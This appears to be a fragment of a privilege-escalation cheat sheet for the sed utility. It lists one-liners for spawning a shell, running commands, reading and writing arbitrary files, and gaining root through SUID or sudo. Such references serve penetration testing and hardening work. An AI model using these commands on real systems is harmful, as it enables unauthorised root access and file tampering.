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sed -n '1e exec sh 1>&0' /etc/hosts |
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sed e |
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sed -n '1e id' /etc/hosts |
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LFILE=file_to_write
sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
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LFILE=file_to_read
sed '' "$LFILE"
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LFILE=file_to_read
./sed -e '' "$LFILE"
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sudo sed -n '1e exec sh 1>&0' /etc/hosts |
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